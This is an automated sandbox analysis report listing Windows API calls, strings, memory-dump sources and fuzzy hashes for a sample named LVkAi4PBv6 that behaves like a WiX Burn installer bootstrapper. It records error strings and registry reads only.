                                                                                                                                                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                                                  • String ID: Failed to initialize COM on cache thread.
                                                                                                                                                                                                                                                                                                  • API String ID: 3442037557-3629645316
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A39F4
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A3A27
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A396E
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A39A1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008A3A8E,?), ref: 008A3C62
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • EnableLUA, xrefs: 008A3C34
                                                                                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 008A3C0C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-3551287084
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00861104,?,?,00000000), ref: 00865142
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00861104,?,?,00000000), ref: 00865172
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareStringlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: burn.clean.room
                                                                                                                                                                                                                                                                                                  • API String ID: 1433953587-3055529264
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 008A690F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A8713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008A8820
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A8713: GetLastError.KERNEL32 ref: 008A882A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$ErrorFileFreeLastStringSystem
                                                                                                                                                                                                                                                                                                  • String ID: atomutil.cpp$clbcatq.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 211557998-3749116663
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00866534
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00865EB2,00000000), ref: 008A0AE0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetProcAddress.KERNEL32(00000000), ref: 008A0AE7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetLastError.KERNEL32(?,?,?,00865EB2,00000000), ref: 008A0AFE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00865CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00865D68
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 00866571
                                                                                                                                                                                                                                                                                                  • Failed to get 64-bit folder., xrefs: 00866557
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                                                                                                                                                                                                                                                  • API String ID: 3109562764-2681622189
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008610DD,?,00000000), ref: 008633E8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008610DD,?,00000000), ref: 008633FF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                                                  • String ID: pathutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2776309574-741606033
                                                                                                                                                                                                                                                                                                  • Opcode ID: ad648fe692a5d27def5c7775b64b21012f38cbcc2dc06d8873e8c4f45dfc5f7b
                                                                                                                                                                                                                                                                                                  • Instruction ID: ddc565f808ee51e41741fed195627581a7d1cdc64f609cf69a7fcd4636f55da5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad648fe692a5d27def5c7775b64b21012f38cbcc2dc06d8873e8c4f45dfc5f7b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF0CD73A4153567D72256AAAC4AA9BFA68FF92B70B174135BE04FB301DE61DD0082E0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0088EBD2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00891380: RaiseException.KERNEL32(?,?,?,0088EBF4,?,00000000,00000000,?,?,?,?,?,0088EBF4,?,008C7EC8), ref: 008913DF
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0088EBEF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                  • Opcode ID: 793352dfb24fceb9a501914f05cf041e010b479c7c3e399df58e244606ee35e7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 09d36085022d9d28415f40f5e34c66ca7eb46fd1114a27d02a25927e385e6fac
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 793352dfb24fceb9a501914f05cf041e010b479c7c3e399df58e244606ee35e7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06F0C23590420DBACF00BAA8E84AE9D777CFA00360B5445A4F925E2691EB70EE1587D2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,771B34C0,?,?,?,0086BA1D,?,?,?,00000000,00000000), ref: 008A4A1D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0086BA1D,?,?,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 008A4A27
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastSize
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 464720113-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 49b676b1dfb9f133315c2ea33fcc1433dc7128f57f78483b087ebd39c9e55201
                                                                                                                                                                                                                                                                                                  • Instruction ID: 350ed1928072f9a075a1c2e6fd4b45dff358af22ef353d88aeeaaf43202f1ab4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49b676b1dfb9f133315c2ea33fcc1433dc7128f57f78483b087ebd39c9e55201
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55F0A47694013AABAB108F89890595AFBACFF45720B01411AFD44E7700E7B0BD1087D4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,00865466,?,00000000,00865466,?,?,?), ref: 008A3DA7
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00000000,00000000,00000001,008C716C,?), ref: 008A3DBF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Microsoft.Update.AutoUpdate, xrefs: 008A3DA2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                                                                                                  • String ID: Microsoft.Update.AutoUpdate
                                                                                                                                                                                                                                                                                                  • API String ID: 2151042543-675569418
                                                                                                                                                                                                                                                                                                  • Opcode ID: 875729b5e0cd6a03bfd882f7eddcd30a75965e2a0ccf2b38c4ec4f6eaaabc5a3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1e973dcbaf77d15f1ab71c9f052542af2e6e670cb7021e63a2d4a1458e1831aa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 875729b5e0cd6a03bfd882f7eddcd30a75965e2a0ccf2b38c4ec4f6eaaabc5a3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F05E71600608BBEB00EFA8DD05EEFB7BCFB09710F40046AFA01E7251D671AE0487A2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A3200
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A3230
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A34AD
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A34DD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 008A0E28
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                  • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-850864035
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,005C10DD,?,00000000), ref: 005C33E8
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 005C10F6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C1186
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C1191
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005C119F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: GetLastError.KERNEL32(?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C11BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005C11C2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: GetLastError.KERNEL32(?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C11D7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,0060B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 005C1131
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                                                                                                                                                                                  • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3687706282-3151496603
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0062B5FC,00000000,?,?,?,?,005E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005FFEF4
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,005E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005FFF04
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 005FFF0D
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(8007139F,?,005E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005FFF23
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0062B5FC,005E12CF,?,00000000,0000FDE9,?,005E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0060001A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                                                                                                                                                  • String ID: $eb$%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$(eb$,eb$0eb
                                                                                                                                                                                                                                                                                                  • API String ID: 296830338-3922426939
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1c57b8dc4013269eda4ccc651a753852fc6067a350b00afca0a3fa78ed5af88b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9d3cd5f3de24d91ee34bb5a646a1bf3d6bc538da41092938b3a7e3510a0ef93b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c57b8dc4013269eda4ccc651a753852fc6067a350b00afca0a3fa78ed5af88b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A419D32D40619ABDF258FA4DC44BBFBBBAFF08B11F045465FA01A6290D7388D41CBA0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy working folder., xrefs: 005DA116
                                                                                                                                                                                                                                                                                                  • Failed create working folder., xrefs: 005DA0EE
                                                                                                                                                                                                                                                                                                  • Failed to calculate working folder to ensure it exists., xrefs: 005DA0D8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                                                                                                                                                                  • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                                                                                                                                                                  • API String ID: 3841436932-2072961686
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0a1166f6fcef0b8e05b9b906c29b3ff06e0728ee35e9387c1456708bdd6c7872
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1b52a82d3aadcd678df7eeee494bafd7d7ec20c4bc2f33f765c6321907439f64
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a1166f6fcef0b8e05b9b906c29b3ff06e0728ee35e9387c1456708bdd6c7872
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1018432945529FA8B325A99DC0AC9FBE7AFF94B20B154257F8007A310EB359F40E691

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
